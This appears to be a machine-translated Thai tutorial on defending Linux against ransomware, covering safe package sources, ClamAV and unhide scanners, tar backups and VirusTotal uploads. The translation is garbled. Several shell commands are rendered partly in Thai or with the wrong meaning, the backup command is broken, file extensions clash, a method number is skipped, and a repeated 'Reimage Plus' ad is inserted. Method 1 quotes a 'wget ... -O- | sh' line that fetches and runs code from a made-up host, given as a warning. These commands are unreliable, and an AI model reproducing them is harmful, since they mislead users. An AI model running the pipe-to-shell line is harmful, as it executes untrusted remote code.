วิธีการป้องกัน Linux จาก Ransomwares

Ransomware เป็นหนึ่งในปัญหาที่คุกคามมากขึ้นในโลกของการรักษาความปลอดภัยเครือข่ายในปัจจุบัน มันน่ากลัวที่คิดว่าใครบางคนอาจถือตัวประกันข้อมูลของคุณ การติดตั้ง ransomware บางตัวเข้ารหัสข้อมูลทั้งหมดในไดรฟ์ข้อมูลโดยเฉพาะและบุคคลที่อยู่เบื้องหลังมันต้องการเงินจำนวนหนึ่งก่อนที่พวกเขาจะตกลงที่จะปล่อยคีย์ที่จำเป็นในการปลดล็อกข้อมูลดังกล่าว โดยเฉพาะอย่างยิ่งสำหรับผู้ที่มีเงินลงทุนเป็นจำนวนมาก อย่างไรก็ตามมีข่าวดีสำหรับผู้ใช้ลีนุกซ์

ภายใต้สถานการณ์ส่วนใหญ่รหัส ransomware ของคุณยากที่จะควบคุมสิ่งต่างๆได้มากกว่าไดเรกทอรีบ้านของผู้ใช้ โปรแกรมเหล่านี้ไม่มีสิทธิ์ในถังขยะทั้งการติดตั้ง นี่คือเหตุผลที่ ransomware Linux มีปัญหาเกี่ยวกับเซิร์ฟเวอร์ที่ผู้ปฏิบัติงานมีสิทธิ์เข้าถึงรากอยู่เสมอ Ransomware ไม่ควรเป็นปัญหาสำหรับผู้ใช้ Linux และมีขั้นตอนหลายขั้นตอนในการป้องกันไม่ให้เกิดขึ้นกับคุณ

วิธีที่ 1: ป้องกันการโจมตีสไตล์ BashCrypt

BasyCrypt เป็นหลักฐานของแนวคิดของ ransomware ที่พิสูจน์ว่าเป็นไปได้ที่จะติดโครงสร้างเซิร์ฟเวอร์ด้วยรหัสที่เป็นอันตรายประเภทนี้ นี่เป็นพื้นฐานสำหรับสิ่งที่แพ็คเกจ ransomware Linux อาจมีลักษณะเช่นนี้ ขณะนี้ยังไม่เป็นที่รู้จักทั่วไปมาตรการป้องกันทั่วไปสำหรับผู้บริหารเซิร์ฟเวอร์ของแพลตฟอร์มอื่น ๆ สามารถทำงานได้ดีเช่นกันที่นี่ ปัญหาอยู่ที่ว่าในสภาพแวดล้อมระดับองค์กรอาจมีผู้คนจำนวนมากใช้ระบบโฮสต์

หากคุณใช้เซิร์ฟเวอร์อีเมลอาจเป็นเรื่องยากที่จะทำให้ผู้คนไม่ทำสิ่งที่โง่เขลา พยายามอย่างดีที่สุดเพื่อเตือนทุกคนว่าไม่ควรเปิดไฟล์แนบที่ไม่แน่ใจและมัลแวร์มักจะสแกนทุกอย่างที่มีปัญหา สิ่งหนึ่งที่สามารถช่วยป้องกันไม่ให้เกิดการโจมตีประเภทนี้มาจากการเฝ้าดูวิธีที่คุณติดตั้งไบนารีด้วย wget ธรรมชาติเซิร์ฟเวอร์อีเมลของคุณอาจขาดสภาพแวดล้อมเดสก์ท็อปโดยสิ้นเชิงและคุณอาจใช้ wget, apt-get, yum หรือ pacman เพื่อจัดการแพ็กเกจที่จะมาถึง สิ่งสำคัญคือต้องดูว่าที่เก็บข้อมูลใดใช้ในการติดตั้งเหล่านี้ บางครั้งคุณอาจเห็นคำสั่งที่ต้องการให้คุณดำเนินการบางอย่างเช่น wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh หรืออาจอยู่ภายในสคริปต์เชลล์ ไม่ว่าจะด้วยวิธีใดก็ตามอย่าใช้งานหากคุณไม่ทราบว่าพื้นที่เก็บข้อมูลดังกล่าวมีไว้สำหรับ

วิธีที่ 2: การติดตั้งชุดสแกนเนอร์

มีหลายเทคโนโลยีการสแกนมัลแวร์โอเพนซอร์สอยู่ ClamAV เป็นที่รู้จักกันดีที่สุดและคุณสามารถติดตั้งได้กับการกระจาย apt-based จำนวนมากโดยใช้:

sudo apt-get ติดตั้ง clamav

เมื่อติดตั้งแล้วมนุษย์ clamav ควรอธิบายการใช้งานในภาษาธรรมดา โปรดจำไว้ว่าแม้ว่าจะสามารถสแกนและลบไฟล์ที่ติดไวรัสได้ แต่ก็ไม่สามารถลบโค้ดที่ติดเชื้อจากไฟล์ได้ นี่เป็นสถานการณ์ทั้งหมดหรือไม่มีเลย

มีเครื่องสแกนเนอร์ตัวที่สองที่คุณอาจไม่คุ้นเคย แต่มีประโยชน์หากกระบวนการที่ซ่อนไว้เป็นสิ่งที่ทำให้คุณหวาดกลัว อีกครั้งถ้าคุณใช้การกระจายแบบ apt จากนั้นพิมพ์คำสั่งนี้เพื่อติดตั้งโปรแกรมยกเลิกการซ่อน:

sudo apt-get ยกเลิกการติดตั้ง

PRO TIP: หากปัญหาเกิดขึ้นกับคอมพิวเตอร์หรือแล็ปท็อป / โน้ตบุ๊คคุณควรลองใช้ซอฟต์แวร์ Reimage Plus ซึ่งสามารถสแกนที่เก็บข้อมูลและแทนที่ไฟล์ที่เสียหายได้ วิธีนี้ใช้ได้ผลในกรณีส่วนใหญ่เนื่องจากปัญหาเกิดจากความเสียหายของระบบ คุณสามารถดาวน์โหลด Reimage Plus โดยคลิกที่นี่

เมื่อติดตั้งแล้วให้พิมพ์:

sudo ยกเลิกการซ่อน sys

การดำเนินการนี้จะสแกนระบบของคุณสำหรับกระบวนการที่ซ่อนอยู่ทั้งหมด

วิธีที่ 4: การเก็บข้อมูลสำรองที่สะอาดอยู่ในมือ

ขณะนี้ไม่ควรแม้แต่จะเป็นปัญหาเพราะทุกคนควรทำสำรองข้อมูลมีการสำรองข้อมูลที่ดีได้ทันทีสามารถ zap ransomware ออก สิ่งที่น้อยมาก ransomware มีอยู่บนแพลตฟอร์มลินุกซ์มีแนวโน้มที่จะโจมตีไฟล์ที่มีนามสกุลเฉพาะสำหรับแพลตฟอร์มการพัฒนาเว็บ ซึ่งหมายความว่าหากคุณมีไฟล์. php, .xml หรือ. js ที่กำลังนั่งอยู่รอบ ๆ คุณจะต้องการให้ทำซ้ำขั้นตอนนี้ พิจารณาบรรทัดต่อไปนี้ของรหัส:

tar -cf backups.tar $ (ค้นหาชื่อ * .ruby หรือหรือชื่อ * .html)

ควรสร้างแฟ้มเก็บเทปขนาดใหญ่ของทุกไฟล์ด้วยส่วนขยาย. gruby และ .html ภายในโครงสร้างไฟล์ จากนั้นจะสามารถย้ายไปยังไดเรกทอรีย่อยชั่วคราวอื่นเพื่อการสกัดเพื่อให้แน่ใจว่าการสร้างมันทำงานอย่างถูกต้อง

ที่เก็บเทปนี้สามารถและควรจะย้ายไปยังไดรฟ์ข้อมูลภายนอก คุณสามารถใช้. bz2, .gz หรือ. xv ได้ก่อนที่จะทำเช่นนั้น คุณอาจต้องการสร้างสำเนาสำรองโดยคัดลอกไปยังไดรฟ์ข้อมูลที่ต่างกันสองเล่ม

วิธีที่ 5: การใช้สแกนเนอร์บนเว็บ

บางทีคุณอาจได้ดาวน์โหลดแพคเกจ RPM หรือ DEB จากไซต์ที่สัญญาว่าจะมีซอฟต์แวร์ที่เป็นประโยชน์ ซอฟต์แวร์มีการแจกจ่ายผ่าน 7z หรือบีบอัดไฟล์ tar เช่นกัน ผู้ใช้อุปกรณ์เคลื่อนที่อาจได้รับแพ็กเกจ Android ในรูปแบบ APK คุณสามารถสแกนสิ่งเหล่านี้ได้อย่างง่ายดายด้วยเครื่องมือในเบราว์เซอร์ของคุณ ชี้ไปที่ https://www.virustotal.com/ และเมื่อโหลดหน้าแล้วกดปุ่มเลือกไฟล์ ก่อนที่คุณจะอัปโหลดโปรดจำไว้ว่านี่เป็นเซิร์ฟเวอร์สาธารณะ แม้ว่าแอ็ปเปิ้ลอิงค์จะทำงานได้อย่างปลอดภัยและใช้งานได้ แต่จะถ่ายโอนไฟล์แบบสาธารณะซึ่งอาจเป็นปัญหาในสภาพแวดล้อมที่มีความปลอดภัยสูงบางอย่าง นอกจากนี้ยัง จำกัด ไฟล์ 128 MB

เลือกไฟล์ของคุณในช่องที่ปรากฏขึ้นและเลือกเปิด ชื่อไฟล์จะปรากฏในบรรทัดถัดจากปุ่มหลังจากกล่องหายตัวไป

คลิกที่สีน้ำเงินขนาดใหญ่สแกน! ปุ่ม. คุณจะเห็นอีกช่องหนึ่งที่ระบุว่าระบบกำลังอัปโหลดไฟล์ของคุณ

หากมีผู้ตรวจสอบไฟล์ก่อนหน้านี้แล้วจะแจ้งให้คุณทราบถึงรายงานก่อนหน้านี้ จะพิจารณาจากผลรวมของ SHA256 ซึ่งทำงานได้เหมือนกับเครื่องมือบรรทัดคำสั่ง Linux เดียวกันที่คุณใช้ ถ้าไม่เช่นนั้นก็จะรันการสแกนแบบเต็มรูปแบบด้วยโปรแกรมสแกนที่แตกต่างกัน 53 โปรแกรม บางคนอาจหมดเวลาเมื่อไฟล์ถูกเรียกใช้และผลลัพธ์เหล่านี้สามารถละเลยได้อย่างปลอดภัย

บางโปรแกรมอาจส่งคืนผลลัพธ์ที่แตกต่างจากที่อื่นดังนั้นจึงเป็นเรื่องง่ายที่จะคัดลอกผลบวกปลอมด้วยระบบนี้ ส่วนที่ดีที่สุดคือการทำงานระหว่างแพลตฟอร์มที่แตกต่างกันซึ่งทำให้น่าสนใจอย่างเท่าเทียมกันโดยไม่คำนึงถึงการกระจายที่คุณมีในอุปกรณ์ต่างๆ นอกจากนี้ยังทำงานได้ดีเช่นกันจากการแจกแจงอุปกรณ์เคลื่อนที่เช่น Android ซึ่งเป็นอีกเหตุผลหนึ่งที่เป็นวิธีที่ดีในการตรวจสอบแพคเกจ APK ก่อนใช้งาน

PRO TIP: หากปัญหาเกิดขึ้นกับคอมพิวเตอร์หรือแล็ปท็อป / โน้ตบุ๊คคุณควรลองใช้ซอฟต์แวร์ Reimage Plus ซึ่งสามารถสแกนที่เก็บข้อมูลและแทนที่ไฟล์ที่เสียหายได้ วิธีนี้ใช้ได้ผลในกรณีส่วนใหญ่เนื่องจากปัญหาเกิดจากความเสียหายของระบบ คุณสามารถดาวน์โหลด Reimage Plus โดยคลิกที่นี่